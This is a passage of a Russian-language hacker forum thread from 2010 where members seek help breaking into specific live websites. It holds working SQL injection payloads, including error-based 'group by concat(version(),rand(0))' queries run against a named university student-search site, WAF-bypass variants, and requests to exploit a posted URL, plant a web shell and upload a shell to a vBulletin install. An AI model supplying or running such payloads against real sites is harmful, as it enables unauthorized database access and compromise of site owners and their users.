Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    можно по конкретнее :)
     
    _________________________
  2. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    там Postgre :)
     
    _________________________
  3. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Дак там же ошибка есть, /web/htdocs/albumbandcz/www/pisen.php
     
  4. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886

    man ты а каком сайте говоришь? я вроде не постил имя сайта :)
     
    _________________________
  5. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    -----ЭТО ИЗОБРАЖЕНИЕ-----
    [​IMG]
    -----ЭТО ИЗОБРАЖЕНИЕ-----
    Да и я вроде не тебе писал про тот сайт ;)
    Скинь адрес сайта в личку, гляну.
     
  6. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,518
    Likes Received:
    401
    Reputations:
    196

    Postgres на другом серваке работает, наверное.
     
  7. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    попугай здесь проблема не в этом, в админку не входит (403) , остается версия шелла..

    на сервере других сайтов нету,вывод ошибок отключено..

    можно ли узнать полный путь до сайта?


    oga
     
    _________________________
  8. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    127
    Likes Received:
    9
    Reputations:
    1
    http://www.zone403.ru/club.php?id=-100 - помогите скулю крутануть
     
  9. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Почему запрос к MsSql &Pd=1+or+1=@@version проходит
    а &Pd=1+or+1=(select db_name())
    уже нет???
    ничего не выдает и редирект сразу!
     
  10. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    2GOGA075, Возможно скобки фильтруются
    2EoGeneo, хм, скули не вижу
     
    #13590 Bb0y, 14 Jun 2010
    Last edited: 14 Jun 2010
  11. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Bb0y как это можно обойти??
    И когда делаю запрос &Pd=1+or+1=()
    редиректа нету, я не думаю что все таки фильтруются!!
     
  12. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    2GOGA075, скинь линк в лс, посмотрю
     
  13. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Да select фильтруется.
    Если не скобки, то что ещё там может фильтроваться? seLEcT попробуй вбить. // Постом отправить.
     
    6 people like this.
  14. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Ctacok Смена больших и маленьких букв не помогла, все равно переносит на главную!
     
  15. BlackFan

    BlackFan Member

    Joined:
    3 Jan 2009
    Messages:
    47
    Likes Received:
    40
    Reputations:
    32
    Эксперементирую с group by rand()...

    На 5 версии
    Code:
    select count(0) from table group by concat(version(),[COLOR=Orange]x[/COLOR])
    x = floor(rand(0)*2) или rand(0)|0 или rand(0)&1 или rand()^0
    выдает Duplicate entry
    x = rand(0)
    выполняется без ошибок.

    Решил проверить на 4 версии. (Проверял на сайте http://decanat5.ssau.ru/search_student в sql-inj)
    И вот тут результаты просто поставили в ступор
    Code:
    ' union select 1,count(*),3 from student group by concat([COLOR=Orange]version()[/COLOR],rand(0))/*
    Выдает Duplicate entry, а
    Code:
    ' union select 1,count(*),3 from student group by concat([COLOR=Orange](select 1)[/COLOR],rand(0))/*
    нет. В то время как
    Code:
    ' union select 1,count(*),3 from student group by concat([COLOR=Orange]version(),(select 1)[/COLOR],rand(0))/*
    выдает Duplicate entry, а
    Code:
    ' union select 1,count(*),3 from student group by concat([COLOR=Orange]version(),(select studentid from student limit 1)[/COLOR],rand(0))/*
    нет.

    Так вот вопрос)
    1) Почему на 4 версии иногда прокатывает с rand(0), а на 5, сколько не пытался, так и не получилось
    2) Почему с floor(rand(0)*2) прокатывает всегда, а с теми же rand(0)|0 работает только на 5 версии
    3) Почему вот такой запрос не выдает ошибку, не смотря на то что там floor(rand(0)*2)
    Code:
    ' and (1) = (select count(*) from student group by floor(rand(0)*2))/*
     
  16. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    GOGA075, пробуй что то типа этого:

    ?id=(1)and(1)=(0)union(select(null),table_name,(null)from(information_schema.tables)limit 28,1--)
     
  17. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    jecka3000 тоже никакой реакции...
     
  18. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    127
    Likes Received:
    9
    Reputations:
    1
    Парни, дайте покурить маны по поводу заливки шшела в булку 3.8.4
     
  19. v1d0qz

    v1d0qz Elder - Старейшина

    Joined:
    21 Jul 2007
    Messages:
    67
    Likes Received:
    90
    Reputations:
    52
    1) На 5, работает практически так же, как и на 4, попадется пример, скину в пм.
    2) Самый вероятный вариант, это то, что в 4 версии, символ "|" интерпретируется иначе.
    3) По поводу почему у тебя выдает ошибку в случаях, когда её быть не должно. Я полагаю, в union select у тебя идет объединение колонки studentid, которая уже используется в запросе, в результате чего union со своим свойством делейт-дубликат конфликтует и возвращает false в массив, По сути потому что у тебя идёт повторная выборка. Как-то так :)
     
    #13599 v1d0qz, 14 Jun 2010
    Last edited: 14 Jun 2010
    2 people like this.
  20. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    127
    Likes Received:
    9
    Reputations:
    1
    Подскажите. есть ли тут скуля ?
     
    #13600 EoGeneo, 15 Jun 2010
    Last edited: 15 Jun 2010
Thread Status:
Not open for further replies.